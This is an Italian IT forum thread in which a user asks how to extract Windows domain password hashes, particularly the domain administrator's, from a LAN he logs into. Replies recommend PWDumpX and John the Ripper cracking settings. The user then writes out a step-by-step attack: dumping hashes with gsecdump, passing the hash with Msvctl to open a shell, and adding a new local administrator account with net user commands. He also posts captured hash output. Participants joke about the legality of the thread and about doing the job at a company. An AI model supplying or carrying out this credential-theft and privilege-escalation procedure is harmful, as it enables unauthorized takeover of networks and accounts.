www.MegaLab.it

[microinfo]

Salve è da tempo che seguo questa sito mi è smp piaciuto e ho imparato molte cosette visto che ho notato che siete molto preparati sul sistema windows avrei un quesito da porvi. Grazie alle mie conoscenze e anche da come ho visto nelle voste guide resettare o trovare una password in windows è molto semplice ma io avrei un'altra cosa da chiedervi...se mi trovo in una rete lan e accedo sotto dominio dove posso prendere l'hash delle password ? come posso trovare l'hash dei computer e soprattutto dell'amministratore del dominio?il file sam non penso stia sul mio pc in locale ho sentito parlare di un programma chiamato cachedump lo consocete è in inglese ma a me non funziona.questo è il mio problema e lo espondo a voi che siete piu esperti sono anni che cerco un sistema per capire grazie !

[kap]

Innanzitutto benvenuto nel MegaForum!!!

Hai già provato seguendo queste indicazioni?

P.s: ogni volta che leggo "John the ripper" mi si illuminano gli occhi..eheh...questo lavoro lo facevo sotto debian.. ...bei tempi

[microinfo]

si da quello che ho capito windows memorizza una copia della password nella cache del del pc in locale in modo da accedere anche non in linea l'hash è in formato MSCASH. per decifrarlo devo usare jhon the ripper. solo che 1 devo scaricare cachedump dal p2p visto che i link sono morti www.cr0.net poi lo faccio partire e mi dovrebbe dare tutti gli hash memorizzati smp che il pc abbia attivato la memorizzazione nella cache di password..

[kap]

Lascia perdere cachedump che da quanto letto è piuttosto vecchiotto...prova con PWDumpX v1.1

Codice: Seleziona tutto

Description:

PWDumpX version 1.1 allows a user with administrative privileges to retrieve the domain password cache, password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.

If an input list of remote systems is supplied, PWDumpX will attempt to obtain the domain password cache, the password hashes and the LSA secrets from each remote Windows system in a multi-threaded fashion (up to 64 systems simultaneously).

The domain password cache, password hashes and LSA secrets from remote Windows systems are encrypted as they are transfered over the network. No data is sent over the network in clear text.

This tool is a completely re-written version of CacheDump, PWDump3e and LSADump2 which integrates suggestions/bug fixes for PWDump3e and LSADump2 found on various web sites, etc.

Source code included.

Credits:

My intent with including the source code along with this tool is to give something back to the I.T. security community. I learned a lot while creating PWDumpX but I could not have done it without the original source code for CacheDump, PWDump2, PWDump3e, and LSADump2.
So...thanks to the creators of these tools for being generous enough to include the source code with these tools so that hungry minds can learn new things.

fonte

Pagina del coder

download

[microinfo]

6 stato genitilissimo ho avviato il programma e da quello che ho capito ho messo ip del mio pc in lan e poi ho fatto + +. PWDumpX.exe 192.168.1.2 + + e quindi mi ha creato 2 file txt(LSA secret,PW hashes) solo che c'è scritto un casino di robba quali devo usare e che programma mi consigli?

[kap]

Stiamo scrivendo post sul filo della legalità....ih ih

ma tanto sappiamo sia io che te che queste informazioni ti servono solo per curiosità

..come ben sai in rete non trovi istruzioni pronte all'uso sull'utilizzo di certi programmi (non vorrei mettermi a provare il programma in questione visto che sto preparando un esame) altrimenti tutti i muccetti starebbero a tentare di sniffare pacchetti e a provare a catturare chiavi pgp...
Ho trovato però una simpatica guida che descrive in maniera abbastanza accurata quello che serve a te


saluti

[microinfo]

ciao ottima la guida spiega davvero molte debolezze dei sistemi windows, peccato che molto materiale utile a questo mondo sia tutto in inglese da quello che ho potuto capire e che basta che possiedi l'accesso administrator locale e non in dominio, poi si estraggono gli hash e si possono usare per aprire una shell cmd nel pc admistrator del dominio assurdo sembra impossibile wow. ha casa ho una minirete di pc sto provando quanto descritto sono molto curioso non lo so a volte mi vengono ste pazzie voglia di scoprire ciò che pochi conoscono.Visto che però mastico poco l'inglese mi potresti abbreviare un po la guida ci sono tanti comandi poco compransibili helpme comunque grazie davvero 6 molto esperto una persona csi è rara trovarla credimi

[clic]

mi potresti abbreviare un po la guida ci sono tanti comandi poco compransibili helpme

sono certo che se lo paghi bene, kap potrebbe venire direttamente in azienda a fare il lavoretto sporco al tuo posto
intendiamoci, se il prezzo è buono anche io sarei disponibile

agli admin, sarebbe carino un tag che avvisa quando si è in modalità ca++eggio

[kap]

mi potresti abbreviare un po la guida ci sono tanti comandi poco compransibili helpme

Appena termino di preparare un esame che ho in ballo vedo cosa riesco a fare (guarda caso l'esame è proprio sulla sicurezza informatica! )

sono certo che se lo paghi bene, kap potrebbe venire direttamente in azienda a fare il lavoretto sporco al tuo posto

Non ci scherzerei più di tanto...ih ih ih

intendiamoci, se il prezzo è buono anche io sarei disponibile

Che fai? mi togli il pane di bocca?

agli admin, sarebbe carino un tag che avvisa quando si è in modalità ca++eggio

[clic]

agli admin, sarebbe carino un tag che avvisa quando si è in modalità ca++eggio

a volte si scherza e per qualcuno potrebbe non essere evidente, ma con un tag apposito [ca++eggio][/ca++eggio] il problema sarebbe risolto

comunque sul tag non dico sul serio

chiedo venia per il clamoroso OT specie nei confronti di chi ha aperto il topic

[kap]

ahnnnnnnnnn! in quel senso!

scusami ma lo studio mi sta rendendo più scemo di quanto già non lo sia...

Se inserissero il tag [ca**eggio] io lo dovrei usare perennemente quindi non mi pare il caso

[microinfo]

vabn okokok lasciamo stare..comunque nte ho posto il mio problema e kap è stato (l'unico) molto disponibile che mi ha kiarito le idee mi sono state molto utili le sue info tt qui.

[kap]

vabn okokok lasciamo stare..comunque nte ho posto il mio problema e kap è stato (l'unico) molto disponibile che mi ha kiarito le idee mi sono state molto utili le sue info tt qui.

Ci mancherebbe! se posso essere utile ben venga!
Comunque controlla questo thread ogni tanto perché tra qualche giorno inserirò il post che tanto ti fa gola

P.s: evita l'utilizzo di tutte quelle brutte abbreviazioni tipo nte, che, tt..ecc..ecc.... la lettura da parte mia e di tutta l'utenza è molto più scorrevole se vengono usate le parole per intere ...in fondo l'italiano è una così bella lingua!!!!!


saluti!

[microinfo]

okok quando 6 disponibile mi riaiuti intanto io cerco di studiare il sistema ciaoo

[Matilda12]

Salve a tutti,
mi accodo solo per aggiungere qualche piccola informazione/curiosità.

Per poter far masticare a John The Ripper un hash del tipo Ms-Cache, bisogna prendere una versione con patch del software. Tale pezza si chiama "jumbo patch build for Win32" e si può trovare QUI.
Curiosità: per far lavorare John The Ripper con l'algoritmo Ms-Cache bisogna utilizzare il comando "--format=mscash" e non "mscache" ... stranezze, eh?

Due ulteriori aspetti:
1) John The Ripper è particolarmente veloce per gli attacchi a dizionario (un ottimo dizionario può essere reperito QUI);
2) John The Ripper offre una modalità, definita "Incremental", che "può provare tutte le combinazioni di caratteri"; purtroppo è limitata a 8 caratteri; in questo caso è meglio Cain & Abel che, pur essendo (decisamente) più lento, non ha tali limiti.


Raccomandazione: assunto che ognuno è libero di fare ciò che vuole, purché poi sia disposto ad assumersi (nel bene e nel male) tutte le responsabilità delle proprie azioni, mi permetto di suggerire di impiegare queste informazioni non per lanciare "l'attacco al castello" del sistema, piuttosto per capire come funzionano le cose e verificare la validità della propria password.


Matilda12

P.S.
Quanto sopra è vero fino a querela di falso ... ovvio!

[microinfo]

allora ecco quello che ho capito in modo semplice:
1 Entro in un pc con accesso administartor in locale.
2 Avvio gsecdump.exe sperando che tra gli ultimi accessi ci sia quello dell'admin del dominio. allora da cmd faccio:
gsecdump.exe -u
3 Invece di crakkare l'hash uso il tool Msvctl usando cmd e faccio:
Msvctl.exe (domain)\(user)::(lm hash):(ntlm hash)::: run cmd
4 Aggiungo un utente sempre da cmd e faccio:
Net use \\(n_macchina)
Net user (user) (password) /add
Net localgroup administrators (user) /add
Net localgroup administrators
###########################################
mo provo con queste istruzioni e vi faccio sapere...

[microinfo]

gsecdump.exe -u ho questi hash in uscita..

PC-1DOMINIO\Administrator::f0d412bd764ffe81aad3b435b51404ee:209c6174da490caeb422f
3fa5a7ae634:::
DOMINIO\PC-1DOMINIO$::00000000000000000000000000000000:78ffaadb7bbd5fd4f81083ae38e8c6
f0:::
DOMINIO\PC-1DOMINIO$::00000000000000000000000000000000:78ffaadb7bbd5fd4f81083ae38e8c6
f0:::

perché la password è 0000000000000?
xso comunque che non c'è l'hash dell'amministratore del dominio..
il primo sono io che accedo come admin locale il secondo e il terzo io che accedo come limitato...